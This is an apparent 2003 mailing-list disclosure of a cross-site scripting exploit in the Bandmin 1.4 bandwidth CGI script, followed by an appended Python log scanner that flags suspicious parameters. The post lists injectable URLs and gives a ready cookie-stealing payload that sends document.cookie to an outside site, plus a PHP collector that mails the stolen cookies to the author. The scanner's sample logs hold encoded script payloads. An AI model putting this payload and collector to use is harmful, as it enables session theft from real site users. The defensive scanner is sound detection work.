Bandmin 1.4 XSS Exploit

From: silent needel (silentneedleat_private)
Date: Wed May 28 2003 - 09:38:40 PDT

    Bandmin 1.4 XSS Exploit by Silent Needle
    
    A:BACKGROUND
    Bandmin is a CGI script that shows you the bandwidth for the sites on the server.
    
    B:DESCRIPTION
    The cross-site scripting allows you to print HTML, JavaScript or other
    content in the web page when it is just opened, without writing it into
    the page.
    
    C:EXPLOIT
    These are the URLs of the exploits:
    1 - there are two here
    http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT]
    2 - one here
    http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT]
    
    And you can steal cookies by changing [*** SCRIPT] to
    <script>document.location='http://any-web-site/cookies.php?'+document.cookie</script>
    and in http://any-web-site/cookie.php put
    ----------------cookie.php-------------------
    <?
    mail("silentneedleat_private","cookies from bandmin",$http_cookie);
    echo $http_cookie;
    ?>
    -----------------------------------------------
    
    D:GREETZ
    To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN 
    AWAY :)
    
    E:CONTACT
    Silent Needle
    silentneedleat_private
    
    F:OH LONG NIGHT
    Bye
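
For defenders, an added example (not part of the original post and not Bandmin code): a Python check that flags access-log requests to /bandwidth/index.cgi whose year, month or host parameter fails an allow-list. The allow-list formats are assumptions inferred from the sample URL in the post (month=May, year=2003), and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-lists are assumptions inferred from the sample URL in the post
# (month=May, year=2003); the formats Bandmin really accepts may differ.
ALLOWED = {
    "year": re.compile(r"[0-9]{4}"),
    "month": re.compile(r"[A-Za-z]{3,9}"),
    "host": re.compile(r"[A-Za-z0-9.-]{1,253}"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_params(log_line):
    """Return the sorted names of year/month/host values failing the allow-list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/bandwidth/index.cgi"):
        return []
    # parse_qs percent-decodes, so %3Cscript%3E is checked as <script>;
    # double-encoded input still contains '%' and fails the allow-list too.
    params = parse_qs(url.query, keep_blank_values=True)
    return sorted(
        name for name, pattern in ALLOWED.items()
        if any(not pattern.fullmatch(v) for v in params.get(name, []))
    )

def scan(lines):
    """Return (1-based line number, bad parameter names) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        bad = suspicious_params(line)
        if bad:
            hits.append((number, bad))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/May/2003:09:40:01 -0700] "GET /bandwidth/index.cgi?action=showmonth&year=2003&month=May HTTP/1.0" 200 5120',
    '192.0.2.77 - - [28/May/2003:09:41:13 -0700] "GET /bandwidth/index.cgi?action=showmonth&year=%3Cscript%3Ealert(1)%3C/script%3E&month=May HTTP/1.0" 200 4096',
    '192.0.2.77 - - [28/May/2003:09:41:20 -0700] "GET /bandwidth/index.cgi?action=showhost&month=May&year=2003&host=%3Cimg%20src%3Dx%3E HTTP/1.0" 200 4096',
    '192.0.2.10 - - [28/May/2003:09:42:00 -0700] "GET /index.html?year=%3Cb%3E HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious parameter(s): {', '.join(bad)}")
```

The same allow-list applied inside the CGI before the values are echoed, together with HTML-encoding on output, is the corresponding fix on the server side.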
    


